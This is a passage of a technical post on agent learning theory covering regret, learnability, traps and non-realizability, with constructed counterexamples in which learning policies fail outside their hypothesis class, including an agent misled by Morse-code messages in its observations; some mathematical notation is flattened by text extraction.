.MJXc-TeX-size2-R {font-family: MJXc-TeX-size2-R,MJXc-TeX-size2-Rw}
.MJXc-TeX-size3-R {font-family: MJXc-TeX-size3-R,MJXc-TeX-size3-Rw}
.MJXc-TeX-size4-R {font-family: MJXc-TeX-size4-R,MJXc-TeX-size4-Rw}
.MJXc-TeX-vec-R {font-family: MJXc-TeX-vec-R,MJXc-TeX-vec-Rw}
.MJXc-TeX-vec-B {font-family: MJXc-TeX-vec-B,MJXc-TeX-vec-Bx,MJXc-TeX-vec-Bw}
@font-face {font-family: MJXc-TeX-ams-R; src: local('MathJax\_AMS'), local('MathJax\_AMS-Regular')}
@font-face {font-family: MJXc-TeX-ams-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_AMS-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_AMS-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_AMS-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-cal-B; src: local('MathJax\_Caligraphic Bold'), local('MathJax\_Caligraphic-Bold')}
@font-face {font-family: MJXc-TeX-cal-Bx; src: local('MathJax\_Caligraphic'); font-weight: bold}
@font-face {font-family: MJXc-TeX-cal-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Caligraphic-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Caligraphic-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Caligraphic-Bold.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-frak-R; src: local('MathJax\_Fraktur'), local('MathJax\_Fraktur-Regular')}
@font-face {font-family: MJXc-TeX-frak-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Fraktur-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Fraktur-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Fraktur-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-frak-B; src: local('MathJax\_Fraktur Bold'), local('MathJax\_Fraktur-Bold')}
@font-face {font-family: MJXc-TeX-frak-Bx; src: local('MathJax\_Fraktur'); font-weight: bold}
@font-face {font-family: MJXc-TeX-frak-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Fraktur-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Fraktur-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Fraktur-Bold.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-math-BI; src: local('MathJax\_Math BoldItalic'), local('MathJax\_Math-BoldItalic')}
@font-face {font-family: MJXc-TeX-math-BIx; src: local('MathJax\_Math'); font-weight: bold; font-style: italic}
@font-face {font-family: MJXc-TeX-math-BIw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Math-BoldItalic.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Math-BoldItalic.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Math-BoldItalic.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-sans-R; src: local('MathJax\_SansSerif'), local('MathJax\_SansSerif-Regular')}
@font-face {font-family: MJXc-TeX-sans-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_SansSerif-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_SansSerif-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_SansSerif-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-sans-B; src: local('MathJax\_SansSerif Bold'), local('MathJax\_SansSerif-Bold')}
@font-face {font-family: MJXc-TeX-sans-Bx; src: local('MathJax\_SansSerif'); font-weight: bold}
@font-face {font-family: MJXc-TeX-sans-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_SansSerif-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_SansSerif-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_SansSerif-Bold.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-sans-I; src: local('MathJax\_SansSerif Italic'), local('MathJax\_SansSerif-Italic')}
@font-face {font-family: MJXc-TeX-sans-Ix; src: local('MathJax\_SansSerif'); font-style: italic}
@font-face {font-family: MJXc-TeX-sans-Iw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_SansSerif-Italic.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_SansSerif-Italic.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_SansSerif-Italic.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-script-R; src: local('MathJax\_Script'), local('MathJax\_Script-Regular')}
@font-face {font-family: MJXc-TeX-script-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Script-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Script-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Script-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-type-R; src: local('MathJax\_Typewriter'), local('MathJax\_Typewriter-Regular')}
@font-face {font-family: MJXc-TeX-type-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Typewriter-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Typewriter-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Typewriter-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-cal-R; src: local('MathJax\_Caligraphic'), local('MathJax\_Caligraphic-Regular')}
@font-face {font-family: MJXc-TeX-cal-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Caligraphic-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Caligraphic-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Caligraphic-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-main-B; src: local('MathJax\_Main Bold'), local('MathJax\_Main-Bold')}
@font-face {font-family: MJXc-TeX-main-Bx; src: local('MathJax\_Main'); font-weight: bold}
@font-face {font-family: MJXc-TeX-main-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Main-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Main-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Main-Bold.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-main-I; src: local('MathJax\_Main Italic'), local('MathJax\_Main-Italic')}
@font-face {font-family: MJXc-TeX-main-Ix; src: local('MathJax\_Main'); font-style: italic}
@font-face {font-family: MJXc-TeX-main-Iw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Main-Italic.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Main-Italic.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Main-Italic.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-main-R; src: local('MathJax\_Main'), local('MathJax\_Main-Regular')}
@font-face {font-family: MJXc-TeX-main-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Main-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Main-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Main-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-math-I; src: local('MathJax\_Math Italic'), local('MathJax\_Math-Italic')}
@font-face {font-family: MJXc-TeX-math-Ix; src: local('MathJax\_Math'); font-style: italic}
@font-face {font-family: MJXc-TeX-math-Iw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Math-Italic.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Math-Italic.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Math-Italic.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-size1-R; src: local('MathJax\_Size1'), local('MathJax\_Size1-Regular')}
@font-face {font-family: MJXc-TeX-size1-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Size1-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Size1-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Size1-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-size2-R; src: local('MathJax\_Size2'), local('MathJax\_Size2-Regular')}
@font-face {font-family: MJXc-TeX-size2-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Size2-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Size2-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Size2-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-size3-R; src: local('MathJax\_Size3'), local('MathJax\_Size3-Regular')}
@font-face {font-family: MJXc-TeX-size3-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Size3-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Size3-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Size3-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-size4-R; src: local('MathJax\_Size4'), local('MathJax\_Size4-Regular')}
@font-face {font-family: MJXc-TeX-size4-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Size4-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Size4-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Size4-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-vec-R; src: local('MathJax\_Vector'), local('MathJax\_Vector-Regular')}
@font-face {font-family: MJXc-TeX-vec-Rw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Vector-Regular.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Vector-Regular.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Vector-Regular.otf') format('opentype')}
@font-face {font-family: MJXc-TeX-vec-B; src: local('MathJax\_Vector Bold'), local('MathJax\_Vector-Bold')}
@font-face {font-family: MJXc-TeX-vec-Bx; src: local('MathJax\_Vector'); font-weight: bold}
@font-face {font-family: MJXc-TeX-vec-Bw; src /\*1\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/eot/MathJax\_Vector-Bold.eot'); src /\*2\*/: url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/woff/MathJax\_Vector-Bold.woff') format('woff'), url('https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.2/fonts/HTML-CSS/TeX/otf/MathJax\_Vector-Bold.otf') format('opentype')}
, and after that, the environment gives an observation from the finite observation set O. There is a bounded loss function ℓ that is known to the agent in advance, assigning real-valued losses to finite histories. Usually, we will work with ℓ:A×O→R loss functions. This choice is motivated by game theory, where the learning process would be a repeated game, and in each turn, the loss is determined by the agent's action and the opponent1s action (the observation).
This definition of loss function is already pretty general, because for any loss function that can only take finitely many values, we can encode the loss in the observation itself, which gives the loss function the desired ℓ:A×O→R form. It's important that we required the loss function to be bounded, otherwise we could encounter inconvenient [St. Petersburg paradox](https://en.wikipedia.org/wiki/St._Petersburg_paradox)-style scenarios.
The agent has to take repeated actions either until a time horizon T or indefinitely. If the the agent's lifespan is infinite, there needs to be a way to compare overall results instead of just saying "there is infinite loss accumulated anyway", so we introduce a time discount rate γ∈(0,1). We will concentrate on this infinite, time discounted version.
**Notation** (ΔX). *For a space*X*, the notation*ΔX*refers to the space of probability distributions over*X*.*
An environment is e:(A×O)∗×A→ΔO that assigns a probability distribution over observations to every finite history ending with the agent taking an action.
The agent has a policy π:(A×O)∗→ΔA that assigns a probability distribution over actions to every finite history ending with an observation.
A policy is good if it ensures that the the agent is successful in a range of environments.
Formally, the agent has a hypothesis class H made of environments (H is usually defined to be finite or countably infinite). It wants to use a policy π such that for every environment e∈H, the policy π has low regret with respect to environment e.
**Definiton 1** (Expected regret).
*The expected regret of policy*π*in environment*e*with respect to loss function*Lγ*is defined as the expected loss under policy*π*minus the minimum expected loss over all policies*π∗*in environment*e*with respect to loss function*Lγ*:*
ER(π,e,Lγ)=Eπ,e(Lγ)−minπ∗Eπ∗,e(Lγ).Here Lγ denotes the overall loss with γ discount rate:
**Definiton 2** (Lγ).
Lγ=(1−γ)∞∑t=0γtℓ(t)*where*ℓ(t)*is the agent's loss in turn*t*.*
Intuitively, an agent with a good policy takes some time to explore the environment, then as the agent becomes reasonably certain which environment he is in, it starts exploiting the environment, although potentially still taking exploratory steps occasionally.
As the discount rate γ goes to 1, the agent has more and more time to freely explore its environment, because 1000 rounds of exploration is still not too costly compared to the overall utility, so hopefully it will be true that whichever environment e∈H the agent is placed in, it will have time to decide which environment he is in, with a very low probability of mistake, then start to play an almost-optimal strategy for that environment, thus ensuring the regret to be low. If this holds, we call the hypothesis class H learnable. Formally,
**Definiton 3** (Learnability).
*A hypothesis class*H*is said to be learnable, if there exists a family of policies*{πγ}*, such that for every environment*e∈H*,*
limγ→1ER(πγ,e,Lγ)=0.It's important to note that not every hypothesis class is learnable. For example, take a hypothesis class that contains these two environments: In environment E, if the agents makes move X in the first turn, it goes to Heaven (receives minimal loss in every turn then on), otherwise it goes to Hell (receives maximal loss in every turn then on). Environment F is just the reverse. Then it's impossible to construct a policy that has low regret with respect to both environments E and F.
This is a classical example of a trap: an action that has irrevocable consequences. Generally speaking, neither classical nor infra-Bayesian learning theory has a good model of what agents are supposed to do in an environment that might contain traps. This is a big open question that seriously limits our mathematical formalism of real-world agency (as the real world is full of traps, most notably death). But this is an independent concern that infra-Bayesianism doesn't try to address, so we are only looking at learnable hypothesis classes now.
Fortunately, some natural hypothesis classes turn out to be learnable, as we will discuss later. The heuristics is that if no mistake committed in a short period of time is too costly, according to any environment in the class, then the class will be learnable.
Before we look at examples, it's useful to establish the following simple theorem:
**Theorem 4**.
*If every finite subset of the countable hypothesis class*H*is learnable, then*H*itself is learnable.*
Now we can look at examples of learnable hypothesis classes:
**Definiton 5** (Bandit environment). *$\$*
*A bandit is an environment in which, in every turn, the probability distribution of the observation only depends on the action in that turn. A bandit environment can be characterized by a function*B:A→ΔO.
The "bandit" name comes from the illustration that the agent is placed in a casino with various slot machines, aka "one-armed bandits" and the action is choosing the slot machine, and each machine has a probability distribution according to which the agent gets an observation (the amount of money falling out of the machine).
**Theorem 7**. *A class*H*of bandit-environments is always learnable.*
*Proof.* We will only prove the statement only for countable classH, but it's not hard to expand to proof further. By Theorem 4, it's enough to prove for finite classes to have a proof for every countable class.
For a finite hypothesis class H, it's enough to just always play the action that produced the lowest loss on average in the past, and occasionally do exploratory moves and try the other actions too, but with a frequency decreasing towards 0.
As γ→1, and the agent lives longer in expectation, the action producing the smallest loss in expectation will become the one with the smallest average loss, due to the law of large numbers. Then, the agent will mostly play that optimal action, so it's average regret goes to 0. ◻
We could be interested not just in learnability, but in what regret bounds are achievable given a time discount rate γ or time horizon T. For this, we would need to find the optimal rate to decrease the frequency of exploratory steps. There is a nice answer to this question in the literature, but we don't go into details here, as the exact regret bounds are not crucial for the main topic of this post.
A broader hypothesis class we will use is finite-state communicating [POMDP](https://en.wikipedia.org/wiki/Partially_observable_Markov_decision_process)s.
(We could also look at [Markov Decision Processes (MDPs)](https://en.wikipedia.org/wiki/Markov_decision_process) as an intermediate step, but we are ignoring them for this post.)
**Definiton 8** (POMDP).
*A Partially Observed Markov Decision Process consists of a set of hidden states*S*, a stochastic transition function*f:S×A→ΔS*(where*A*is the set of the agent's possible actions), and an observation function*F:S→O*.*
**Definiton 9** (Finite state communicating POMDP).
*A POMDP in which*S*is finite and has the property that for every*s1,s2∈S*, an agent can have a policy*π*such that starting from state*s1*and following policy*π*, it eventually gets to state*s2*with probability*1*.*
**Theorem 10**. *A hypothesis class made of finite-state communicating POMDPs is always learnable.*[[1]](#fntvwwxz1dies)
There are some learnable hypothesis classes even broader than this, but they are enough for our purpose now, as many systems can be modelled as finite state communicating POMDPs: the world can be in a number of ways, you can't see everything in the world, but have some limited observations and corresponding rewards, and you can make some reversible changes in the world.
Bayes-optimal policies
----------------------
Instead of ensuring that the regret is low with respect to every individual hypothesis in the class, the agent can aim for the weighted average of regrets being low.
**Definiton 11** (Bayesian regret). *Given a prior distribution*ζ*on the hypothesis class*H*, the Bayesian regret of a policy*π*is*
Ee∼ζER(π,e,L).**Theorem 12**.
*Given a countable hypothesis class*H*and a non-dogmatic prior*ζ*on*H*(non-dogmatic meaning that*ζ(h)>0*for all*h∈H*), and a family of policies*πγ*, then*
limγ→1Ee∼ζER(πγ,e,Lγ)=0*is equivalent to*
limγ→1ER(πγ,e,Lγ)=0∀e∈H,*that is, the class*H*being learnable and*π*being a good learning algorithm.*
This result might suggest that Bayesian regret doesn't give us much value over considering regret with respect to individual hypotheses, but we will see that it has important application.
Most importantly, now that (given a prior distribution), we can assign a single quantity to the policy's performance, we can look at the policy that minimizes the Bayesian regret:
**Definiton 13** (Bayes-optimal policy).
*Given a prior distribution*ζ*over the hypothesis class*H*, the policy*π*is said to be Bayes-optimal if it minimizes the Bayesian regret. This is equivalent with the policy minimizing*
Ee∼ζEπ,e(L).Using the previous result, we can prove the following, rather unsurprising statement:
**Theorem 14**.
*Given a learnable, countable hypothesis class*H*and a non-dogmatic prior*ζ*on*H*, if we take the Bayes-optimal policy*πγ*for every*γ∈(0,1)*, then this family of policies learn the hypothesis class*H*.*
As we will see later, it's often easier to prove nice properties about Bayes-optimal policies than just policies with low regret bound in general.
However, while there are some famous algorithms in the literature that ensure low regret bounds (like UCB, UCRL, Exp3), it's usually computationally intractable to find the Bayes-optimal policy. In general, it's more reasonable to expect that a real-life algorithm will achieve some low regret bounds than that it will be literally the best, Bayes-optimal policy.
Thus, both in the academic literature and in our work, we usually want to prove more general theorems in the form "Every policy that has low regret bounds with respect to this hypothesis class, has that property" instead of the much narrower claim of "The Bayes-optimal policy has that property". Still, when we can't prove something stronger, we sometimes fall back to investigating the Bayes-optimal policy.
Non-realizability and classical learning theory
===============================================
The big problem of classical learning theory is that we have no guarantees that a policy selected for having low regret with respect to the environments in its hypothesis class, will also behave reasonably when placed in an environment that is not contained in its hypothesis class. (An environment not in the hypothesis class is called [non-realizable](https://www.lesswrong.com/posts/i3BTagvt3HbPMx6PN/embedded-agency-full-text-version#3_1__Realizability).)
Unfortunately, however broad hypothesis class the agent has, we can't expect it to have a model of itself or an equally complex agent encoded in any of its hypotheses about the world. This is true for both practical reasons (it can't contain in its head a model of the world bigger than itself) and for theoretical reasons (if the model could have a model including itself, it could have a policy of doing the opposite of what its model predicts, which would lead to an obvious paradox). Also, even excluding these situations, the world is just very big, and it's unrealistic to assume that an AI could have the "true state of the world" fully modeled as one of its hypotheses. So it would be nice if we had some guarantees about the agent's performance in environment that are not directly encoded as one of its hypotheses.
A naive hope would be that maybe it's not a big problem, and if an algorithm learns a broad enough hypothesis class, then it necessarily generalizes to do reasonably well even outside the class. Let's look at some concrete examples that it's not the case.
The 010101... failure mode
--------------------------
The agent's loss function is this: any time it plays action X, it gets 0 loss, any time it plays action Y, it gets 1 loss, regardless of the observations. The environment is oblivious, so the observations don't depend on the agent's actions. Obviously, the right choice would be to always play X.
Suppose the agent's hypothesis class consists only of bandits. Then, surprisingly, this learning algorithm will guarantee extremely low expected regret with respect to every environment in the hypothesis class:
"Start with action Y, and and play action Y as long as the observation history looks like 010101... After the first deviation from this sequence, take action X ever after."
As the pattern 010101... is very unlikely to continue for long under any bandit environment, this policy has very low expected regret. In particular, the bandit with respect to which this policy has the highest expected regret (if γ goes to 1) is the one in which, after an action Y, the observations 0 and 1 both have 12. In that environment, the expected regret is
(1−γ)∞∑k+0γk12k=1−γ1−γ2which goes to 0 as γ goes to 1.
It's good to note that the failure mode doesn't need to be just one specific history, it can leave some wiggle room, like the following policy:
"Always play X except if in the history so far the difference between the number of 1s and 0s is at most √n (where n is the length of your history so far) and there were at most √n instances when two observations coming after each other were equal. In that case, play Y."
The probability of observing a long sequence like that is still vanishingly unlikely in any bandit environment, so the policy is allowed to have this broader failure mode too. This means that if the agent is placed in an environment that mostly produces a 01010... sequence, then postulating a little random noise in the environment doesn't save the agent from predictable failure.
I somewhat feel that this is a contrived counter-example: why would and agent have this specific failure mode? I will need to look into [Selection theorems](https://www.lesswrong.com/posts/G2Lne2Fi7Qra5Lbuf/selection-theorems-a-program-for-understanding-agents) in the future, according to my understanding, that agenda is about figuring out which algorithms are likely to selected during a real-life training, and formalize the intuition of "Come on, why would we get an algorithm that has this specific failure mode?" But this is not our agenda, we are looking for provable guarantees, and this example already refutes the naive hope that low regret inside the hypothesis class would always lead to good performance outside the class.
The square-free failure mode
----------------------------
Sure, the 010101... environment can fool an agent that only prepares for bandit environments in its hypothesis class. But maybe if the hypothesis class is broad enough, then a policy that learns the class is really guaranteed to behave reasonably outside the class too! In particular, there is a simple finite-state communicating POMDP that produces the 010101... sequence of observations, so if the agent's hypothesis class is the set of finite-state communicating POMDPs, then a policy that learns it does well in the 010101... environment.
Unfortunately, just broadening the hypothesis class a little doesn't solve the problem: the policy can always have a failure mode, a specific sequence of observations that is very unlikely to happen according to any of the hypotheses in the class, but might easily be encountered in the wild. In the case of a hypothesis class made of finite-state communicating POMDPs, all hypotheses suggest that there is a vanishingly low probability of observing the sequence which is 1 for [square-free](https://en.wikipedia.org/wiki/Square-free_integer) indices and 0 otherwise, so the policy having a failure mode for that sequence doesn't cause much expected regret.
It's important to emphasize that the general problem is not "Well, maybe the agent will encounter a specific random string of observations in the wild and it happens to exactly match its failure mode." No, if the failure mode string was truly random and unexceptional, then there wouldn't be a significant risk of the true environment producing it either. The real problem is that the failure mode can also be a highly non-random string that could be in principle be very predictable from the real environment (like the square-free numbers can be a naturally occurring sequence), but as the agent doesn't have the true environment in its hypothesis class, it can easily happen that a string which is very natural in the true environment is considered very unlikely according to all the agent's hypotheses, therefore the agent is allowed to have it as a failure mode.
Bayes-optimal policies
----------------------
Let's be less ambitious then: If a policy doesn't just have low regret on a hypothesis class, but it's the single best policy given a prior (it's Bayes-optimal), then is it enough to guarantee good performance outside the class?
Sometimes, sort of! Let's assume that for now that we only care about oblivious environments, that is, we can assume that the agent's observations are not influenced at all by its actions. Let's also assume that the agent knows this: its hypothesis class includes only oblivious environments. Further, suppose that there is at least one environment with non-zero prior in the hypothesis class according to which every finite sequence of observations has at least a tiny chance of happening. (For example the environment in which observations are independently random with uniform distribution over O. ) In that case, a Bayes-optimal policy never performs dominated actions: That is, if there are actions a and b and ℓ(a,o)<ℓ(b,o) for all possible observations o, then the agent never takes the action b that is always worse. This is easy to prove, as changing an action from b to a in any situation only decreases the expected loss, the Bayes-optimal policy can never play b.
This is not a very impressive result in itself, especially that even if the agent is actually placed in an oblivious environment, if its hypothesis class contains non-oblivious environments too, then it's suddenly not clear whether the agent will learn not to play dominated actions.
Bayes-optimal policy being deceived by Morse-codes
--------------------------------------------------
Let the agent's loss function is this: any time it plays action X, it gets 0 loss, any time it plays action Y, it gets 1 loss, and in addition to that, any time the observation is 1, it gets 10 loss, and any time the observation is 0, it gets 0 loss. The environment is oblivious, so the observations don't depend on the agent's actions. Obviously, the right choice would be to always play X.
However, the agent doesn't know for certain that the environment is oblivious, it has some prior probability on hypotheses according to which action Y makes observation 0 more likely, in which case it could be better to play Y.
So the agent does some experimentation, but doesn't find any statistical correspondence between its actions and the observations (as the environment really is oblivious). But before it could pivot to just playing action X, it realizes that the observations so far are repetitions of this Morse-code: "Your actions didn't matter so far. But if you play action Y until the 1000th turn, then you will be rewarded with 1000 turns of observation 0!"
The agent dutifully plays Y until the 1000th turn. Then the promised reward of long strings of 0s doesn't arrive, instead a new Morse-code starts repeating: "Sorry, I lied last time, but I'm telling the truth now, promise! If you play Y until the 10000th turn, you will be rewarded with 10000 observations 0!" And so on.
Will the agent fall for that? Depends on the prior. It can have a prior according to which, for every n, a hypothesis of the form "I get lots of Morse-code warning signs until turn 10n, and if I comply, I get the promised reward of 10n " has relatively high prior probability, while the Morse-code appearing has low probability according to all other hypotheses. In that case, seeing the Morse-code can make the agent comply again and again.
After some time, the promise of future reward becomes less appealing because the time discount rate. When exactly? The agent needs to take an action now at time t that causes 1 loss now, but will lead to 10 reward at time 10t if the "Morse-code tells the truth" hypothesis is true, which can have probability at least 12 given the right prior, because every other hypothesis is very unlikely after observing the repetition of the Morse-code a few times. The agent takes the loss now if γ9t>15, in other words t>−ln59lnγ.
For γ close to 1, lnγ is approximately γ−1. So the agent will take the bait until approximately turn t=ln59(1−γ), which is the ln59 ratio of its expected lifespan, so falling for the trap this long causes a non-negligible regret.
We already knew that if the hypothesis class contains traps (possibilities that a finite string of actions have indefinite, irrevocable consequences), then the agent can fail to learn the hypothesis class. But note that it's not the case here: none of the considered hypotheses are traps, as none of them assumes irrevocable consequences of actions, a particular hypothesis just posits that some actions have consequences that last 10n turns in the future, that's not really a trap, as γ→1, it would become negligible.
